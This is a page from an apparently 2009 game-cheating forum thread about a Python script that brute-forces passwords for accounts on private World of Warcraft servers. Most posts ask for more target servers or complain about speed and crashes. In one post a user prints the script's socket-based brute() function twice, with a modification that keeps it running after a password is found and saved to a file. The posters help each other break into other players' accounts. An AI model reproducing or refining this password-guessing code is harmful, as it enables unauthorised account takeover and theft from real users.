Multy bruteforce script menu

Shout-Out

User Tag List

Page 3 of 4 FirstFirst 1234 LastLast
Results 31 to 45 of 57
  1. #31
    AlienCCL's Avatar Active Member
    Reputation
    28
    Join Date
    Aug 2008
    Posts
    444
    Thanks G/R
    0/1
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by Ukrajinc View Post
    well well well doesn't someone think highly of himself.btw alien you were once a leacher too.and looking at your join date you dont give much to this site, so if i were you i would kindly zip it.thank you

    Edit: And yes i do have low rep.I am home 1 maybe 2 months in a year so i dont visit the site much
    i said about gilbert94

    Multy bruteforce script
  2. #32
    karapidiola's Avatar Active Member
    Reputation
    51
    Join Date
    Mar 2008
    Posts
    166
    Thanks G/R
    1/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    video added

  3. #33
    chiem's Avatar Contributor
    Reputation
    137
    Join Date
    Sep 2007
    Posts
    506
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Hmm, how come when u run it, it goes through the a b c really fast? mine takes 4 seconds for every letter

  4. #34
    gunite69's Avatar Member
    Reputation
    12
    Join Date
    Dec 2008
    Posts
    110
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    This will tkae ages.. any of those servers has an armory?

    wowtorn has 1

  5. #35
    stefanbot's Avatar Member
    Reputation
    1
    Join Date
    Oct 2008
    Posts
    13
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    please add:
    echonet.ro
    omegaW0W.eu

  6. #36
    gunite69's Avatar Member
    Reputation
    12
    Join Date
    Dec 2008
    Posts
    110
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    is there anyway to boost the speed of the program up??

    like take more cpu??

    faster internett?? or is it the servers hosting speed?

    for some reason when searching through the passwords. the cmd just close randomly half way through. any ideas?? some people have the same problem but no solution.
    Last edited by gunite69; 04-15-2009 at 10:21 PM.

  7. #37
    Khaos1220's Avatar Member
    Reputation
    1
    Join Date
    Mar 2009
    Posts
    4
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Don't know if anyone else noticed, but it skips 'u' and 'v' so open it w/ IDLE and add 'u' 'v' to the list of letters. For those of you wondering. .
    EDIT:
    I also added
    Code:
    sleep(1)
    print("[+]Brute Will Start In 2'' Have Fun")
    sleep(1)
    print("[+]Brute Will Start In 1'' Have Fun")
    sleep(1)
    to the .py so when it runs it looks a bit smoother, but that was for my own personal enjoyment, hope you don't mind :P
    EDIT 2: Ok I found why it closes on you
    Code:
    def brute(ip_p,sock,err_base,pack,pwd):
        timeout = 5
        sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        print ('[-]Trying User :' + user + ' With Password :'+pwd)
        try:
            sock.connect((ip_p,int(80)))
        except:
            print('[+]Error Cant Connect')
            exit(1)
        try:
            sock.send(pack)
        except:
            print('[+]Error Cant Send')
            exit(1)
        try:
            buff1 = sock.recv(600)
        except(socket.timeout):
            None
        sock.settimeout(1)
        if err_base in buff1:
            print '[*]Password Found !'
            print '__*-> '+pwd+' <-*__'
            string = 'Password for ' + user + ' is ' + pwd + ' In Realm ' + id
            file = open('password.txt','w')
            file.write(string)
            file.close()
            exit(1)
        else:
            try:
                buff2 = sock.recv(1024)
                if err_base in buff2:
                    print '[*]Password Found !'
                    print '__*-> '+pwd+' <-*__'
                    file = open('password.txt','w')
                    string = 'Password for ' + user + ' is ' + pwd + ' In Realm ' + id
                    file.write(string)
                    file.close()
                    exit(1)
    Will close it out on you when it finds a password. Now if you meant to leave it like this then let me know and I'll remove my next code wrap. Edit your to look like this
    Code:
    def brute(ip_p,sock,err_base,pack,pwd):
        timeout = 1
        sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        print ('[-]Trying User :' + user + ' With Password :'+pwd)
        try:
            sock.connect((ip_p,int(80)))
        except:
            print('[+]Error Cant Connect')
            exit(1)
        try:
            sock.send(pack)
        except:
            print('[+]Error Cant Send')
            exit(1)
        try:
            buff1 = sock.recv(600)
        except(socket.timeout):
            None
        sock.settimeout(1)
        if err_base in buff1:
            print '[*]Password Found !'
            print '__*-> '+pwd+' <-*__'
            string = 'Password for ' + user + ' is ' + pwd + ' In Realm ' + id
            file = open('password.txt','w')
            file.write(string)
        else:
            try:
                buff2 = sock.recv(1024)
                if err_base in buff2:
                    print '[*]Password Found !'
                    print '__*-> '+pwd+' <-*__'
                    file = open('password.txt','w')
                    string = 'Password for ' + user + ' is ' + pwd + ' In Realm ' + id
                    file.write(string)
    And it won't close out on you next time.
    Last edited by Khaos1220; 04-16-2009 at 08:19 PM. Reason: added code again

  8. #38
    gunite69's Avatar Member
    Reputation
    12
    Join Date
    Dec 2008
    Posts
    110
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    nah wha i ment was that, 10 mins in seraching through the program... it cuts out on me...............

    i think its because of the original user logging into the game..

    btw khaos u think u can do me a favor?

    Um do u think u can make 1 so that it also adds the "u" and the "v" and fix the problem where it cuts out on me?(when it cuts out it doenst find password either)

    u have msn or something so i can chatt to u ?
    Last edited by gunite69; 04-16-2009 at 08:41 PM.

  9. #39
    Khaos1220's Avatar Member
    Reputation
    1
    Join Date
    Mar 2009
    Posts
    4
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    If you got team viewer or something I'll just open yours up and edit it. If not I can host it some where and I'll send you the link of my edited one

  10. #40
    gunite69's Avatar Member
    Reputation
    12
    Join Date
    Dec 2008
    Posts
    110
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    u got msn??

  11. #41
    Khaos1220's Avatar Member
    Reputation
    1
    Join Date
    Mar 2009
    Posts
    4
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    No, lol I don't communicate well with others.

  12. #42
    Confucius's Avatar Super Moderator Don't Look Back in Anger

    CoreCoins Purchaser Authenticator enabled
    Reputation
    1414
    Join Date
    Oct 2007
    Posts
    2,795
    Thanks G/R
    299/307
    Trade Feedback
    7 (100%)
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    i've noticed all the leechers are mostly in this section... is that bad?!

  13. #43
    Floppy's Avatar Member
    Reputation
    1
    Join Date
    Nov 2007
    Posts
    1
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Could you add Deathknell to that list please?

  14. #44
    thiagoelmiro's Avatar Member
    Reputation
    8
    Join Date
    Jul 2008
    Posts
    16
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    This works on Funserver.cc ?

  15. #45
    Khaos1220's Avatar Member
    Reputation
    1
    Join Date
    Mar 2009
    Posts
    4
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Figured no one had issues reading the print command or looking at the first post, was gonna let this thread die. It only works with the listed servers.

Page 3 of 4 FirstFirst 1234 LastLast

Similar Threads

  1. Etternion-Wow bruteforce script
    By karapidiola in forum WoW EMU Exploits & Bugs
    Replies: 26
    Last Post: 05-09-2009, 10:40 AM
  2. [AHK Script] Multi-directional Hunter Disengage
    By CrazyCactuaR in forum World of Warcraft Bots and Programs
    Replies: 2
    Last Post: 04-03-2009, 09:11 AM
  3. Any Anti AFK Scripts available?
    By paboee in forum World of Warcraft General
    Replies: 2
    Last Post: 08-30-2006, 09:11 AM
  4. World of Warcraft Hack - Syndrome (Multi-Hack for 1.9.4)
    By Matt in forum World of Warcraft Bots and Programs
    Replies: 44
    Last Post: 07-26-2006, 12:55 PM
  5. [Program] WoW Jumper AntiAFK Script
    By Cypher in forum World of Warcraft Bots and Programs
    Replies: 5
    Last Post: 06-23-2006, 10:38 PM
All times are GMT -5. The time now is 06:07 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search